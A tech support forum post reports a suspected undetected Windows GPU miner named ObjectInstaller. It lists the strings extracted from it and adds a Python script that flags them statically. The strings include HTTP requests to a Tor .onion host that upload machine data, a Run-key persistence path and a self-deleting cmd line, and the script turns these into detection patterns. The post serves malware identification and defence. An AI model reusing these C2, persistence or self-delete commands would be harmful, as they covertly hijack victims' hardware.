Channel: Tech Support Forum - Virus/Trojan/Spyware Help

I found a new virus not detected by any antivirus. Objectinstaller

Nothing detects this yet.

Not Malwarebytes

Not ADW

Not Win Defender

No antivirus programs

The process creates a C:\Program Files\ObjectInstallerService folder containing a data file and objectinstaller.exe

This is a delayed service in Windows services.

The .exe file is a self-extracting executable.

It creates a Tor folder in program files.

Examining the contents of the zip without executing it lists a number of files, one of which contains the following strings.

The executable strings include:



AppData
GPURise
gpurise.zip
!GPURiseAgent.exe
service2
other
payload2.zip
start_min
1\ObjectInstallerService\
W/C choice /C Y /N /D Y /T 8 & rmdir /Q /S "
"
cmd.exe
[Software\Microsoft\Windows\CurrentVersion\Run
127.0.0.1
-mjo7mw3q4mtgsikz.onion
GET / ۇ HTTP/1.1
Host: mjo7mw3q4mtgsikz.onion
Connection: keep-alive
Accept: text/html
User-Agent: gpuboost 0.1

7\
Content-Length: (.*?)\
X2
desktop
laptop
;select * from Win32_Processor
Gselect * from Win32_VideoController
root\CIMV2
iSELECT TotalPhysicalMemory FROM Win32_ComputerSystem
'TotalPhysicalMemory
name
AdapterRAM
nvidia
amd
NumberOfCores
SSELECT Caption FROM Win32_OperatingSystem
/upload/install
!POST /upload HTTP/1.1
Host: mjo7mw3q4mtgsikz.onion
Connection: keep-alive
Accept: text/html
Content-type: application/json
Content-Length: 7
User-Agent: miner 0.1

geforce
radeon
QBad response received from proxy server.
1Authentication required.
COperation completed successfully.
;General SOCKS server failure.
EConnection not allowed by ruleset.
)Network unreachable.
#Host unreachable.
'Connection refused.
TTL expired.
-Command not supported.
7Address type not supported.
Unknown error.
tor
tor.exe
tor.zip
MTor has successfully opened a circuit.
\Tor\
X=
Y=
Enter X Offset
X Offset
1
'Wrong Parameters...
Enter Y Offset
Y Offset
%pictureLevel.Image
pictureLevel
pRight
pLeft
pSelected
list
menu
menuStrip1
+fileToolStripMenuItem
File
mOpen
Open...
mSave
Save
mSaveAs
Save as...
%toolStripMenuItem1
mExit
Exit
1actiondToolStripMenuItem
Actions
AoffsetXSelectedToolStripMenuItem
!Offset X Selected
AoffsetYSelectedToolStripMenuItem
!Offset Y Selected
-aboutToolStripMenuItem
About
PTop
PRest
)Mario Levels | *.xml
pButtom
status
statusStrip1
labelx
labely
Tahoma
objectname
label
$this.Icon
MainForm
LevelEditor.dll
cInt
cBool
True
False
: X=
, Y=
.
Arial
lName
label1
cInt1
cInt2
cInt3
cBool1
cBool2
cBool3
bClose
Close
bSave
FormParams
#Object Properties
/data/u/InstallService
-ObjectInstallerService
KMarioLevelEditor.Properties.Resources
Selected
Caption





.onion is undeniably the Tor network. I believe it's a GPU miner. It mines bitcoin remotely by taking over your GPU.



I don't know how I got this or who to inform about this file.

I saved a .zip copy if anyone wants it.
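
A static triage sketch for strings like the ones quoted in this post, added here as an example and not part of the original post: it pulls UTF-16LE strings (the wide-character encoding Windows binaries commonly use for embedded text) out of a file's bytes without executing it and flags the indicator types visible in the post. The function names, the pattern labels and the sample blob are constructed for illustration.

```python
import re

# Runs of at least 4 printable ASCII characters stored as UTF-16LE.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")

# Indicator patterns modelled on the strings quoted in the post.
# The labels are hypothetical names chosen for this example.
INDICATORS = {
    "tor_hidden_service": re.compile(r"\b(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion\b"),
    "run_key_persistence": re.compile(
        r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", re.I),
    "wmi_hardware_query": re.compile(
        r"select .+ from Win32_(Processor|VideoController|ComputerSystem)", re.I),
    "delayed_self_delete": re.compile(
        r"choice /C Y /N /D Y /T \d+ & rmdir /Q /S", re.I),
    "bundled_tor": re.compile(r"\btor\.(exe|zip)\b", re.I),
}

def utf16_strings(blob: bytes) -> list[str]:
    """Return every UTF-16LE printable-ASCII string found in blob."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]

def triage(blob: bytes) -> dict[str, list[str]]:
    """Map each indicator label to the extracted strings that matched it."""
    hits: dict[str, list[str]] = {}
    for s in utf16_strings(blob):
        for label, pattern in INDICATORS.items():
            if pattern.search(s):
                hits.setdefault(label, []).append(s)
    return hits

# Constructed sample: a few strings from the post, encoded as UTF-16LE and
# separated by non-printable filler bytes, standing in for a real file.
SAMPLE_STRINGS = [
    "AppData",
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    "Host: mjo7mw3q4mtgsikz.onion",
    "select * from Win32_VideoController",
    r'/C choice /C Y /N /D Y /T 8 & rmdir /Q /S "',
    "tor.exe",
    "MainForm",
]
SAMPLE = b"\x17\x01".join(s.encode("utf-16-le") for s in SAMPLE_STRINGS)

if __name__ == "__main__":
    for label, matched in triage(SAMPLE).items():
        print(f"{label}: {matched}")
```

To check a real sample, pass the bytes of the file (read with `open(path, "rb")`) to `triage` on an isolated analysis machine.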
